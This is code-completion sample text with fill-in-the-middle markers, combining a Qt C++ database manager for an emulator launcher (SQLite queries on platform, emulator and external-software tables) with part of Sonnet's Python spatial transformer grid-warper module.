else if (platform=="Sony Playstation 2")
{
return "pcsx2";
}
else if (platform=="Sony Playstation 3")
{
return "rpcs3";
}
else if (platform=="Sony Playstation Portable")
{
return "PPSSPP";
}
else if (platform=="PC")
{
return "PC";
}
return platform;
}
QStringList DbManager::SupportedEmulatorToPlatforms(QString emulatorName)
{
QStringList platforms;
if (emulatorName=="nestopia")
{
platforms.append("Nintendo Entertainment System (NES)");
}
else if (emulatorName=="snes9x")
{
platforms.append("Super Nintendo (SNES)");
}
else if (emulatorName=="Project64")
{
platforms.append("Nintendo 64");
}
else if (emulatorName=="Dolphin")
{
platforms.append("Nintendo GameCube");
platforms.append("Nintendo Wii");
}
else if (emulatorName=="Cemu")
{
platforms.append("Nintendo Wii U");
}
else if (emulatorName=="VisualBoyAdvance")
{
platforms.append("Nintendo Game Boy");
platforms.append("Nintendo Game Boy Color");
platforms.append("Nintendo Game Boy Advance");
}
else if (emulatorName=="DeSmuME")
{
platforms.append("Nintendo DS");
}
else if (emulatorName=="citra")
{
platforms.append("Nintendo 3DS");
}
else if (emulatorName=="ePSXe")
{
platforms.append("Sony Playstation");
}
else if (emulatorName=="pcsx2")
{
platforms.append("Sony Playstation 2");
}
else if (emulatorName=="rpcs3")
{
platforms.append("Sony Playstation 3");
}
else if (emulatorName=="PPSSPP")
{
platforms.append("Sony Playstation Portable");
}
return platforms;
}
bool DbManager::addPlatformEntry(QString platform)
/*Provided a platform, this function adds it to the platform table.
*/
{
bool success = false;
QSqlQuery query;
query.prepare("INSERT INTO platform (platform,game_counter,opened_counter) VALUES (:platform,:game_counter,:opened_counter)");
query.bindValue(":platform",platform);
query.bindValue(":game_counter",0);
query.bindValue(":opened_counter",0);
if(query.exec())
{
success = true;
}
else
{
qDebug() << "addPlatformEntry error: " << query.lastError().text();
}
setPlatformEmulator(platform,PlatformToSupportedEmulator(platform));
return success;
}
bool DbManager::deletePlatformEntry(QString platform)
/*Provided a platform name, this function removes it from the platform table (and therefore from the database).
*/
{
bool success = false;
QSqlQuery query;
query.prepare("DELETE FROM platform WHERE platform = :platform;");
query.bindValue(":platform",platform);
if(query.exec())
{
success = true;
}
else
{
qDebug() << "deletePlatformEntry error: " << query.lastError().text();
}
return success;
}
bool DbManager::incrementPlatformGameCounter(QString platform, bool plus)
//Provided a platform, increments (plus=true) or decrements (plus=false) its game_counter by 1.
{
bool success = false;
QSqlQuery query;
query.prepare("UPDATE platform SET game_counter=:game_counter WHERE platform=:platform;");
if (plus)
{
query.bindValue(":game_counter",getPlatformGameCounter(platform)+1);
}
else
{
query.bindValue(":game_counter",getPlatformGameCounter(platform)-1);
}
query.bindValue(":platform",platform);
if(query.exec())
{
success = true;
}
else
{
qDebug() << "incrementPlatformGameCounter error: " << query.lastError().text();
}
return success;
}
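//Note: this update is a read-modify-write across two queries
//(getPlatformGameCounter, then the UPDATE), so concurrent writers could lose
//a count. A sketch of a single-statement, atomic alternative under SQLite:
//
//    query.prepare("UPDATE platform SET game_counter = game_counter + :delta "
//                  "WHERE platform = :platform;");
//    query.bindValue(":delta", plus ? 1 : -1);
//    query.bindValue(":platform", platform);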
QStringList DbManager::getAllPlatforms()
{
QStringList allPlatforms;
QSqlQuery query;
query.prepare("SELECT platform FROM platform;");
if(query.exec())
{
while (query.next())
{
allPlatforms.append(query.value(0).toString());
}
}
else
{
qDebug() << "getAllPlatforms error: " << query.lastError().text();
}
return allPlatforms;
}
QByteArray DbManager::getPlatformImage(QString platform)
/*Provided a platform name, this function returns its image byte array.
*/
{
QByteArray PlatformImage;
QSqlQuery query;
query.prepare("SELECT image_path FROM platform WHERE platform=:platform;");
query.bindValue(":platform",platform);
if(query.exec())
{
while (query.next())
{
PlatformImage = query.value(0).toByteArray();
}
}
else
{
qDebug() << "getPlatformImage error: " << query.lastError().text();
}
return PlatformImage;
}
QString DbManager::getPlatformInfo(QString platform)
/*Provided a platform name, this function returns its platform_info.
*/
{
QString PlatformInfo("");
QSqlQuery query;
query.prepare("SELECT platform_info FROM platform WHERE platform=:platform;");
query.bindValue(":platform",platform);
if(query.exec())
{
while (query.next())
{
PlatformInfo = query.value(0).toString();
qDebug(qUtf8Printable(PlatformInfo));
}
}
else
{
qDebug() << "getPlatformInfo error: " << query.lastError().text();
}
return PlatformInfo;
}
int DbManager::getPlatformGameCounter(QString platform)
/*Provided a platform name, this function returns its game_counter.
*/
{
    int gameCounter = -1; //initialized so a failed query does not return garbage
QSqlQuery query;
query.prepare("SELECT game_counter FROM platform WHERE platform=:platform;");
query.bindValue(":platform",platform);
if(query.exec())
{
while (query.next())
{
gameCounter = query.value(0).toInt();
qDebug(qUtf8Printable(QString::number(gameCounter)));
}
}
else
{
qDebug() << "getPlatformGameCounter error: " << query.lastError().text();
}
return gameCounter;
}
QString DbManager::getPlatformEmulator(QString platform)
/*Provided a platform name, this function returns its emulator_name.
*/
{
QString PlatformEmulator("");
QSqlQuery query;
query.prepare("SELECT emulator_name FROM platform WHERE platform=:platform;");
query.bindValue(":platform",platform);
if(query.exec())
{
while (query.next())
{
PlatformEmulator = query.value(0).toString();
qDebug(qUtf8Printable(PlatformEmulator));
}
}
else
{
qDebug() << "getPlatformEmulator error: " << query.lastError().text();
}
return PlatformEmulator;
}
QString DbManager::getPlatformTimePlayed(QString platform)
/*Provided a platform name, this function returns its time_played.
*/
{
QString timePlayed("");
QSqlQuery query;
query.prepare("SELECT time_played FROM platform WHERE platform=:platform;");
query.bindValue(":platform",platform);
if(query.exec())
{
while (query.next())
{
timePlayed = query.value(0).toString();
qDebug(qUtf8Printable(timePlayed));
}
}
else
{
qDebug() << "getPlatformTimePlayed error: " << query.lastError().text();
}
return timePlayed;
}
QString DbManager::getPlatformLastPlayed(QString platform)
/*Provided a platform name, this function returns its last_played.
*/
{
QString lastPlayed("");
QSqlQuery query;
query.prepare("SELECT last_played FROM platform WHERE platform=:platform;");
query.bindValue(":platform",platform);
if(query.exec())
{
while (query.next())
{
lastPlayed = query.value(0).toString();
qDebug(qUtf8Printable(lastPlayed));
}
}
else
{
qDebug() << "getPlatformLastPlayed error: " << query.lastError().text();
}
return lastPlayed;
}
int DbManager::getPlatformOpenedCounter(QString platform)
{
int openedCounter=-1;
QSqlQuery query;
query.prepare("SELECT opened_counter FROM platform WHERE platform=:platform;");
query.bindValue(":platform",platform);
if(query.exec())
{
while (query.next())
{
openedCounter = query.value(0).toInt();
qDebug(qUtf8Printable(QString::number(openedCounter)));
}
}
else
{
qDebug() << "getPlatformOpenedCounter error: " << query.lastError().text();
}
return openedCounter;
}
bool DbManager::setPlatformEmulator(QString platform, QString emulatorName)
//Provided a platform and an emulator_name, this function sets it.
{
if (platform=="PC")
{
return true;
}
bool success = false;
QSqlQuery query;
query.prepare("UPDATE platform SET emulator_name=:emulator_name WHERE platform=:platform;");
query.bindValue(":platform",platform);
query.bindValue(":emulator_name",emulatorName);
if(query.exec())
{
success = true;
}
else
{
qDebug() << "setPlatformEmulator error: " << query.lastError().text();
}
return success;
}
bool DbManager::setPlatformOpenedCounter(QString platform, int openedCounter)
//Provided a platform and openedCounter, this function sets the opened_counter.
{
bool success = false;
QSqlQuery query;
query.prepare("UPDATE platform SET opened_counter=:opened_counter WHERE platform=:platform;");
query.bindValue(":opened_counter",openedCounter);
query.bindValue(":platform",platform);
if(query.exec())
{
success = true;
}
else
{
qDebug() << "setPlatformOpenedCounter error: " << query.lastError().text();
}
return success;
}
//=============================================================================================================================
//=================================================EMULATOR TABLE OPERATIONS===================================================
//=============================================================================================================================
bool DbManager::addEmulatorEntry(QString emulatorName,QString emulatorPath)
/*Provided an emulator, this function adds it to the emulator table.
*/
{
bool success = false;
QSqlQuery query;
query.prepare("INSERT INTO emulator (emulator_name,path,opened_counter) VALUES (:emulator_name,:path,:opened_counter)");
query.bindValue(":emulator_name",emulatorName);
query.bindValue(":path",emulatorPath);
query.bindValue(":opened_counter",0);
if(query.exec())
{
success = true;
}
else
{
qDebug() << "addEmulatorEntry error: " << query.lastError().text();
}
return success;
}
bool DbManager::deleteEmulatorEntry(QString emulatorName)
/*Provided an emulator name, this function removes it from the emulator table (and therefore from the database).
*/
{
bool success = false;
QSqlQuery query;
query.prepare("DELETE FROM emulator WHERE emulator_name = :emulator_name;");
query.bindValue(":emulator_name",emulatorName);
if(query.exec())
{
success = true;
}
else
{
qDebug() << "deleteEmulatorEntry error: " << query.lastError().text();
}
return success;
}
QByteArray DbManager::getEmulatorImage(QString emulatorName)
/*Provided an emulator_name, this function returns its image byte array.
*/
{
    QByteArray EmulatorImage;
    QSqlQuery query;
    query.prepare("SELECT image_path FROM emulator WHERE emulator_name=:emulator_name;");
    query.bindValue(":emulator_name",emulatorName);
    if(query.exec())
    {
        while (query.next())
        {
            EmulatorImage = query.value(0).toByteArray();
        }
    }
    else
    {
        qDebug() << "getEmulatorImage error: " << query.lastError().text();
    }
    return EmulatorImage;
}
QString DbManager::getEmulatorInfo(QString emulatorName)
/*Provided an emulator_name, this function returns its emulator_info.
*/
{
    QString EmulatorInfo("");
    QSqlQuery query;
    query.prepare("SELECT emulator_info FROM emulator WHERE emulator_name=:emulator_name;");
    query.bindValue(":emulator_name",emulatorName);
    if(query.exec())
    {
        while (query.next())
        {
            EmulatorInfo = query.value(0).toString();
            qDebug(qUtf8Printable(EmulatorInfo));
        }
    }
    else
    {
        qDebug() << "getEmulatorInfo error: " << query.lastError().text();
    }
    return EmulatorInfo;
}
QString DbManager::getEmulatorPath(QString emulatorName)
/*Provided an emulator_name, this function returns its path.
*/
{
QString EmulatorPath("");
QSqlQuery query;
query.prepare("SELECT path FROM emulator WHERE emulator_name=:emulator_name;");
query.bindValue(":emulator_name",emulatorName);
if(query.exec())
{
while (query.next())
{
EmulatorPath = query.value(0).toString();
qDebug(qUtf8Printable(EmulatorPath));
}
}
else
{
qDebug() << "getEmulatorPath error: " << query.lastError().text();
}
return EmulatorPath;
}
QString DbManager::getEmulatorTimePlayed(QString emulatorName)
/*Provided an emulator_name, this function returns its time_played.
*/
{
QString timePlayed("");
QSqlQuery query;
query.prepare("SELECT time_played FROM emulator WHERE emulator_name=:emulator_name;");
query.bindValue(":emulator_name",emulatorName);
if(query.exec())
{
while (query.next())
{
timePlayed = query.value(0).toString();
qDebug(qUtf8Printable(timePlayed));
}
}
else
{
qDebug() << "getEmulatorTimePlayed error: " << query.lastError().text();
}
return timePlayed;
}
QString DbManager::getEmulatorLastPlayed(QString emulatorName)
/*Provided an emulator_name, this function returns its last_played.
*/
{
QString lastPlayed("");
QSqlQuery query;
query.prepare("SELECT last_played FROM emulator WHERE emulator_name=:emulator_name;");
query.bindValue(":emulator_name",emulatorName);
if(query.exec())
{
while (query.next())
{
lastPlayed = query.value(0).toString();
qDebug(qUtf8Printable(lastPlayed));
}
}
else
{
qDebug() << "getEmulatorLastPlayed error: " << query.lastError().text();
}
return lastPlayed;
}
QStringList DbManager::getAllEmulators()
{
QStringList allEmulators;
QSqlQuery query;
query.prepare("SELECT emulator_name FROM emulator;");
if(query.exec())
{
while (query.next())
{
allEmulators.append(query.value(0).toString());
}
}
else
{
qDebug() << "getAllEmulators error: " << query.lastError().text();
}
return allEmulators;
}
<|fim▁hole|>{
int openedCounter=-1;
QSqlQuery query;
query.prepare("SELECT opened_counter FROM emulator WHERE emulator_name=:emulator_name;");
query.bindValue(":emulator_name",emulatorName);
if(query.exec())
{
while (query.next())
{
openedCounter = query.value(0).toInt();
qDebug(qUtf8Printable(QString::number(openedCounter)));
}
}
else
{
qDebug() << "getEmulatorOpenedCounter error: " << query.lastError().text();
}
return openedCounter;
}
bool DbManager::setEmulatorPath(QString emulatorName, QString path)
//Provided an emulator_name and its path, this function sets it.
{
bool success = false;
QSqlQuery query;
query.prepare("UPDATE emulator SET path=:path WHERE emulator_name=:emulator_name");
query.bindValue(":path",path);
query.bindValue(":emulator_name",emulatorName);
if(query.exec())
{
success = true;
}
else
{
qDebug() << "setEmulatorPath error: " << query.lastError().text();
}
return success;
}
bool DbManager::setEmulatorOpenedCounter(QString emulatorName, int openedCounter)
//Provided an emulator_name and openedCounter, this function sets the opened_counter.
{
bool success = false;
QSqlQuery query;
query.prepare("UPDATE emulator SET opened_counter=:opened_counter WHERE emulator_name=:emulator_name;");
query.bindValue(":opened_counter",openedCounter);
query.bindValue(":emulator_name",emulatorName);
if(query.exec())
{
success = true;
}
else
{
qDebug() << "setEmulatorOpenedCounter error: " << query.lastError().text();
}
return success;
}
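//=============================================================================================================================
//=================================================EXTERNAL SOFTWARE TABLE OPERATIONS==========================================
//=============================================================================================================================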
bool DbManager::addExternalSoftwareEntry(QString externalSoftwareName)
/*Provided an external software name, this function adds it to the extsoft table.
*/
{
bool success = false;
QSqlQuery query;
query.prepare("INSERT INTO extsoft (software_name,opened_counter) VALUES (:software_name,:opened_counter)");
query.bindValue(":software_name",externalSoftwareName);
query.bindValue(":opened_counter",0);
if(query.exec())
{
success = true;
}
else
{
qDebug() << "addExternalSoftwareEntry error: " << query.lastError().text();
}
return success;
}
bool DbManager::deleteExternalSoftwareEntry(QString externalSoftwareName)
/*Provided an external software name, this function removes it from the extsoft table (and therefore from the database).
*/
{
bool success = false;
QSqlQuery query;
query.prepare("DELETE FROM extsoft WHERE software_name = :software_name;");
query.bindValue(":software_name",externalSoftwareName);
if(query.exec())
{
success = true;
}
else
{
qDebug() << "deleteExternalSoftwareEntry error: " << query.lastError().text();
}
return success;
}
QStringList DbManager::getAllExternalSoftwares()
{
QStringList allSoftwares;
QSqlQuery query;
query.prepare("SELECT software_name FROM extsoft;");
if(query.exec())
{
while (query.next())
{
allSoftwares.append(query.value(0).toString());
}
}
else
{
qDebug() << "getAllExternalSoftwares error: " << query.lastError().text();
}
return allSoftwares;
}
QString DbManager::getExternalSoftwarePath(QString externalSoftwareName)
/*Provided an external software name, this function returns its path.
*/
{
QString path("");
QSqlQuery query;
query.prepare("SELECT path FROM extsoft WHERE software_name=:software_name;");
query.bindValue(":software_name",externalSoftwareName);
if(query.exec())
{
while (query.next())
{
path = query.value(0).toString();
qDebug(qUtf8Printable(path));
}
}
else
{
qDebug() << "getExternalSoftwarePath error: " << query.lastError().text();
}
return path;
}
bool DbManager::getExternalSoftwareSupportedBool(QString externalSoftwareName)
{
bool supported = false;
QSqlQuery query;
query.prepare("SELECT supported_extsoft FROM extsoft WHERE software_name=:software_name;");
query.bindValue(":software_name",externalSoftwareName);
if(query.exec())
{
while(query.next())
{
supported = query.value(0).toBool();
qDebug(qUtf8Printable(QString::number(supported)));
}
}
else
{
qDebug() << "getExternalSoftwareSupportedBool error : " << query.lastError().text();
}
return supported;
}
int DbManager::getExternalSoftwareOpenedCounter(QString externalSoftwareName)
{
int openedCounter=-1;
QSqlQuery query;
query.prepare("SELECT opened_counter FROM extsoft WHERE software_name=:software_name;");
query.bindValue(":software_name",externalSoftwareName);
if(query.exec())
{
while (query.next())
{
openedCounter = query.value(0).toInt();
qDebug(qUtf8Printable(QString::number(openedCounter)));
}
}
else
{
qDebug() << "getExternalSoftwareOpenedCounter error: " << query.lastError().text();
}
return openedCounter;
}
QList<int> DbManager::getExternalSoftwareGamesWhitelist(QString externalSoftwareName)
{
QList<int> gamesWhitelist;
QString result;
QSqlQuery query;
query.prepare("SELECT games_whitelist FROM extsoft WHERE software_name=:software_name;");
query.bindValue(":software_name",externalSoftwareName);
if(query.exec())
{
while(query.next())
{
            result = query.value(0).toString();
            //Guard against an empty column: splitting "" would yield one empty token (id 0).
            if(!result.isEmpty())
            {
                foreach(QString gameId,result.split('|'))
                {
                    gamesWhitelist.append(gameId.toInt());
                }
            }
}
}
else
{
qDebug() << "getExternalSoftwareGamesWhitelist error : " << query.lastError().text();
}
return gamesWhitelist;
}
QList<int> DbManager::getExternalSoftwareGamesOffList(QString externalSoftwareName)
{
QList<int> gamesOffList;
QString result;
QSqlQuery query;
query.prepare("SELECT games_off_list FROM extsoft WHERE software_name=:software_name;");
query.bindValue(":software_name",externalSoftwareName);
if(query.exec())
{
while(query.next())
{
            result = query.value(0).toString();
            //Guard against an empty column: splitting "" would yield one empty token (id 0).
            if(!result.isEmpty())
            {
                foreach(QString gameId,result.split('|'))
                {
                    gamesOffList.append(gameId.toInt());
                }
            }
}
}
else
{
qDebug() << "getExternalSoftwareGamesOffList error : " << query.lastError().text();
}
return gamesOffList;
}
QStringList DbManager::getExternalSoftwarePlatformsOnList(QString externalSoftwareName)
{
QStringList platformsOnList;
QSqlQuery query;
query.prepare("SELECT platforms_on_list FROM extsoft WHERE software_name=:software_name;");
query.bindValue(":software_name",externalSoftwareName);
if(query.exec())
{
while(query.next())
{
platformsOnList = query.value(0).toString().split('|');
}
}
else
{
qDebug() << "getExternalSoftwarePlatormsOnList error : " << query.lastError().text();
}
return platformsOnList;
}
bool DbManager::getExternalSoftwareGameCanRun(QString extSoftName, int gameId){
bool gameswhitelisted = getExternalSoftwareGamesWhitelist(extSoftName).contains(gameId);
bool gamesoff = getExternalSoftwareGamesOffList(extSoftName).contains(gameId);
bool platformon = getExternalSoftwarePlatformsOnList(extSoftName).contains(getGamePlatform(gameId));
if (gameswhitelisted){
return true;
}
else if(gamesoff){
return false;
}
else if(platformon){
return true;
}
return false;
}
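//Resolution order above: the per-game whitelist wins, then the per-game
//off-list blocks, then the platform-wide on-list applies; everything else
//defaults to false. A hedged example (software name and game id are illustrative):
//
//    //game 7 runs even if its platform is absent from platforms_on_list:
//    db.setExternalSoftwareGamesWhitelist("overlay-tool", QList<int>() << 7);
//    bool canRun = db.getExternalSoftwareGameCanRun("overlay-tool", 7); //true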
bool DbManager::getExternalSoftwareMutliInstance(QString externalSoftwareName){
bool state = false;
QSqlQuery query;
query.prepare("SELECT multi_instance FROM extsoft WHERE software_name=:software_name;");
query.bindValue(":software_name",externalSoftwareName);
if(query.exec())
{
while (query.next())
{
state = query.value(0).toBool();
}
}
else
{
qDebug() << "getExternalSoftwareMultiInstance error: " << query.lastError().text();
}
return state;
}
bool DbManager::setExternalSoftwareGamesWhitelist(QString externalSoftwareName, QList<int> gamesWhitelist)
{
QString gamesWhitelistDB;
foreach(int gameId, gamesWhitelist)
{
gamesWhitelistDB += QString::number(gameId)+"|";
}
gamesWhitelistDB.chop(1);
bool success = false;
QSqlQuery query;
query.prepare("UPDATE extsoft SET games_whitelist=:games_whitelist WHERE software_name=:software_name;");
query.bindValue(":games_whitelist",gamesWhitelistDB);
query.bindValue(":software_name",externalSoftwareName);
if(query.exec())
{
success = true;
}
else
{
qDebug() << "setExternalSoftwareGamesWhitelist error: " << query.lastError().text();
}
return success;
}
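//Serialization note: the whitelist is persisted as one pipe-delimited TEXT
//column, so e.g. QList<int>() << 3 << 7 << 12 is stored as "3|7|12" and is
//split back apart by getExternalSoftwareGamesWhitelist(). chop(1) trims the
//trailing separator; an empty list is therefore stored as an empty string.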
bool DbManager::setExternalSoftwareGamesOffList(QString externalSoftwareName, QList<int> gamesOffList)
{
QString gamesOffListDB;
foreach(int gameId, gamesOffList)
{
gamesOffListDB += QString::number(gameId)+"|";
}
gamesOffListDB.chop(1);
bool success = false;
QSqlQuery query;
query.prepare("UPDATE extsoft SET games_off_list=:games_off_list WHERE software_name=:software_name;");
query.bindValue(":games_off_list",gamesOffListDB);
query.bindValue(":software_name",externalSoftwareName);
if(query.exec())
{
success = true;
}
else
{
qDebug() << "setExternalSoftwareGamesOffList error: " << query.lastError().text();
}
return success;
}
bool DbManager::setExternalSoftwarePlatformsOnList(QString externalSoftwareName, QStringList platformsOnList)
{
    bool success = false;
    QSqlQuery query;
    query.prepare("UPDATE extsoft SET platforms_on_list=:platforms_on_list WHERE software_name=:software_name;");
    query.bindValue(":platforms_on_list",platformsOnList.join('|'));
    query.bindValue(":software_name",externalSoftwareName);
    if(query.exec())
    {
        success = true;
    }
    else
    {
        qDebug() << "setExternalSoftwarePlatformsOnList error: " << query.lastError().text();
    }
    return success;
}
bool DbManager::setExternalSoftwarePath(QString externalSoftwareName, QString path)
//Provided an external software name and its path, this function sets it.
{
bool success = false;
QSqlQuery query;
query.prepare("UPDATE extsoft SET path=:path WHERE software_name=:software_name;");
query.bindValue(":path",path);
query.bindValue(":software_name",externalSoftwareName);
if(query.exec())
{
success = true;
}
else
{
qDebug() << "setExternalSoftwarePath error: " << query.lastError().text();
}
return success;
}
bool DbManager::setExternalSoftwareSupportedBool(QString externalSoftwareName, bool supported)
{
bool success = false;
QSqlQuery query;
query.prepare("UPDATE extsoft SET supported_extsoft=:supported_extsoft WHERE software_name=:software_name;");
query.bindValue(":supported_extsoft",supported);
query.bindValue(":software_name",externalSoftwareName);
if(query.exec())
{
success = true;
}
else
{
qDebug() << "setExternalSoftwareSupportedBool error: " << query.lastError().text();
}
return success;
}
bool DbManager::setExternalSoftwareOpenedCounter(QString externalSoftwareName, int openedCounter)
//Provided an external software name and openedCounter, this function sets the opened_counter.
{
bool success = false;
QSqlQuery query;
query.prepare("UPDATE extsoft SET opened_counter=:opened_counter WHERE software_name=:software_name;");
query.bindValue(":opened_counter",openedCounter);
query.bindValue(":software_name",externalSoftwareName);
if(query.exec())
{
success = true;
}
else
{
qDebug() << "setExternalSoftwareOpenedCounter error: " << query.lastError().text();
}
return success;
}
bool DbManager::setExternalSoftwareMutliInstance(QString externalSoftwareName, bool state){
bool success = false;
QSqlQuery query;
query.prepare("UPDATE extsoft SET multi_instance=:multi_instance WHERE software_name=:software_name;");
query.bindValue(":multi_instance",state);
query.bindValue(":software_name",externalSoftwareName);
if(query.exec())
{
success = true;
}
else
{
qDebug() << "setExternalSoftwareMultiInstance error: " << query.lastError().text();
}
return success;
}<|fim▁end|>
|
int DbManager::getEmulatorOpenedCounter(QString emulatorName)
|
<|file_name|>spatial_transformer.py<|end_file_name|><|fim▁begin|># Copyright 2017 The Sonnet Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
""""Implementation of Spatial Transformer networks core components."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import abc
from itertools import chain
# Dependency imports
import numpy as np
from six.moves import xrange # pylint: disable=redefined-builtin
from sonnet.python.modules import base
from sonnet.python.modules import basic
import tensorflow as tf
class GridWarper(base.AbstractModule):
"""Grid warper interface class.
An object implementing the `GridWarper` interface generates a reference grid
of feature points at construction time, and warps it via a parametric
transformation model, specified at run time by an input parameter Tensor.
Grid warpers must then implement a `create_features` function used to generate
the reference grid to be warped in the forward pass (according to a determined
warping model).
"""
def __init__(self, source_shape, output_shape, num_coeff, name, **kwargs):
"""Constructs a GridWarper module and initializes the source grid params.
`source_shape` and `output_shape` are used to define the size of the source
and output signal domains, as opposed to the shape of the respective
Tensors. For example, for an image of size `width=W` and `height=H`,
`{source,output}_shape=[H, W]`; for a volume of size `width=W`, `height=H`
and `depth=D`, `{source,output}_shape=[H, W, D]`.
Args:
source_shape: Iterable of integers determining the size of the source
signal domain.
output_shape: Iterable of integers determining the size of the destination
resampled signal domain.
num_coeff: Number of coefficients parametrizing the grid warp.
For example, a 2D affine transformation will be defined by the 6
parameters populating the corresponding 2x3 affine matrix.
name: Name of Module.
**kwargs: Extra kwargs to be forwarded to the `create_features` function,
instantiating the source grid parameters.
Raises:
Error: If `len(output_shape) > len(source_shape)`.
TypeError: If `output_shape` and `source_shape` are not both iterable.
"""
super(GridWarper, self).__init__(name=name)
self._source_shape = tuple(source_shape)
self._output_shape = tuple(output_shape)<|fim▁hole|> 'smaller than source domain dimensionality ({})'
.format(len(self._output_shape),
len(self._source_shape)))
self._num_coeff = num_coeff
self._psi = self._create_features(**kwargs)
@abc.abstractmethod
def _create_features(self, **kwargs):
"""Generates matrix of features, of size `[num_coeff, num_points]`."""
pass
@property
def n_coeff(self):
"""Returns number of coefficients of warping function."""
    return self._num_coeff
@property
def psi(self):
"""Returns a list of features used to compute the grid warp."""
return self._psi
@property
def source_shape(self):
"""Returns a tuple containing the shape of the source signal."""
return self._source_shape
@property
def output_shape(self):
"""Returns a tuple containing the shape of the output grid."""
return self._output_shape
def _create_affine_features(output_shape, source_shape):
"""Generates n-dimensional homogenous coordinates for a given grid definition.
`source_shape` and `output_shape` are used to define the size of the source
and output signal domains, as opposed to the shape of the respective
Tensors. For example, for an image of size `width=W` and `height=H`,
`{source,output}_shape=[H, W]`; for a volume of size `width=W`, `height=H`
and `depth=D`, `{source,output}_shape=[H, W, D]`.
Args:
output_shape: Iterable of integers determining the shape of the grid to be
warped.
source_shape: Iterable of integers determining the domain of the signal to be
resampled.
Returns:
List of flattened numpy arrays of coordinates in range `[-1, 1]^N`, for
example:
```
[[x_0_0, .... , x_0_{n-1}],
....
[x_{M-1}_0, .... , x_{M-1}_{n-1}],
[x_{M}_0=0, .... , x_{M}_{n-1}=0],
...
[x_{N-1}_0=0, .... , x_{N-1}_{n-1}=0],
[1, ..., 1]]
```
where N is the dimensionality of the sampled space, M is the
dimensionality of the output space, i.e. 2 for images
and 3 for volumes, and n is the number of points in the output grid.
    When the dimensionality of `output_shape` is smaller than that of
    `source_shape` the last rows before [1, ..., 1] will be filled with 0.
"""
ranges = [np.linspace(-1, 1, x, dtype=np.float32)
for x in reversed(output_shape)]
psi = [x.reshape(-1) for x in np.meshgrid(*ranges, indexing='xy')]
dim_gap = len(source_shape) - len(output_shape)
for _ in xrange(dim_gap):
psi.append(np.zeros_like(psi[0], dtype=np.float32))
psi.append(np.ones_like(psi[0], dtype=np.float32))
return psi
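# A hand-worked sanity check for _create_affine_features (illustrative, not
# part of the library): with output_shape=(2, 2) and source_shape=(2, 2) it
# returns
#
#   [array([-1.,  1., -1.,  1.], dtype=float32),  # x coordinates
#    array([-1., -1.,  1.,  1.], dtype=float32),  # y coordinates
#    array([ 1.,  1.,  1.,  1.], dtype=float32)]  # homogeneous row of ones
#
# i.e. the four corners of [-1, 1]^2 plus the homogeneous row; when
# len(source_shape) > len(output_shape), zero rows are padded in between.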
class AffineGridWarper(GridWarper):
"""Affine Grid Warper class.
The affine grid warper generates a reference grid of n-dimensional points
  and warps it via an affine transformation model determined by an input
parameter Tensor. Some of the transformation parameters can be fixed at
construction time via an `AffineWarpConstraints` object.
"""
def __init__(self,
source_shape,
output_shape,
constraints=None,
name='affine_grid_warper'):
"""Constructs an AffineGridWarper.
`source_shape` and `output_shape` are used to define the size of the source
and output signal domains, as opposed to the shape of the respective
Tensors. For example, for an image of size `width=W` and `height=H`,
`{source,output}_shape=[H, W]`; for a volume of size `width=W`, `height=H`
and `depth=D`, `{source,output}_shape=[H, W, D]`.
Args:
source_shape: Iterable of integers determining the size of the source
signal domain.
output_shape: Iterable of integers determining the size of the destination
resampled signal domain.
constraints: Either a double list of shape `[N, N+1]` defining constraints
on the entries of a matrix defining an affine transformation in N
dimensions, or an `AffineWarpConstraints` object. If the double list is
passed, a numeric value bakes in a constraint on the corresponding
      entry in the transformation matrix, whereas `None` implies that the
corresponding entry will be specified at run time.
name: Name of module.
Raises:
Error: If constraints fully define the affine transformation; or if
        input grid shape and constraints have different dimensionality.
TypeError: If output_shape and source_shape are not both iterable.
"""
self._source_shape = tuple(source_shape)
self._output_shape = tuple(output_shape)
num_dim = len(source_shape)
if isinstance(constraints, AffineWarpConstraints):
self._constraints = constraints
elif constraints is None:
self._constraints = AffineWarpConstraints.no_constraints(num_dim)
else:
self._constraints = AffineWarpConstraints(constraints=constraints)
if self._constraints.num_free_params == 0:
raise base.Error('Transformation is fully constrained.')
if self._constraints.num_dim != num_dim:
raise base.Error('Incompatible set of constraints provided: '
'input grid shape and constraints have different '
'dimensionality.')
super(AffineGridWarper, self).__init__(source_shape=source_shape,
output_shape=output_shape,
num_coeff=6,
name=name,
constraints=self._constraints)
def _create_features(self, constraints):
"""Creates all the matrices needed to compute the output warped grids."""
affine_warp_constraints = constraints
if not isinstance(affine_warp_constraints, AffineWarpConstraints):
affine_warp_constraints = AffineWarpConstraints(affine_warp_constraints)
mask = affine_warp_constraints.mask
psi = _create_affine_features(output_shape=self._output_shape,
source_shape=self._source_shape)
scales = [(x - 1.0) * .5 for x in reversed(self._source_shape)]
offsets = scales
# Transforming a point x's i-th coordinate via an affine transformation
# is performed via the following dot product:
#
# x_i' = s_i * (T_i * x) + t_i (1)
#
# where Ti is the i-th row of an affine matrix, and the scalars s_i and t_i
# define a decentering and global scaling into the source space.
# In the AffineGridWarper some of the entries of Ti are provided via the
# input, some others are instead fixed, according to the constraints
# assigned in the constructor.
# In create_features the internal dot product (1) is accordingly broken down
# into two parts:
#
# x_i' = Ti[uncon_i] * x[uncon_i, :] + offset(con_var) (2)
#
# i.e. the sum of the dot product of the free parameters (coming
# from the input) indexed by uncond_i and an offset obtained by
# precomputing the fixed part of (1) according to the constraints.
# This step is implemented by analyzing row by row the constraints matrix
# and saving into a list the x[uncon_i] and offset(con_var) data matrices
# for each output dimension.
features = []
for row, scale in zip(mask, scales):
x_i = np.array([x for x, is_active in zip(psi, row) if is_active])
features.append(x_i * scale if len(x_i) else None)
for row_i, row in enumerate(mask):
x_i = None
s = scales[row_i]
for i, is_active in enumerate(row):
if is_active:
continue
# In principle a whole row of the affine matrix can be fully
# constrained. In that case the corresponding dot product between input
# parameters and grid coordinates doesn't need to be implemented in the
# computation graph since it can be precomputed.
      # When a whole row is constrained, x_i - which is initialized to
      # None - will still be None at the end of the loop when it is appended
# to the features list; this value is then used to detect this setup
# in the build function where the graph is assembled.
if x_i is None:
x_i = np.array(psi[i]) * affine_warp_constraints[row_i][i] * s
else:
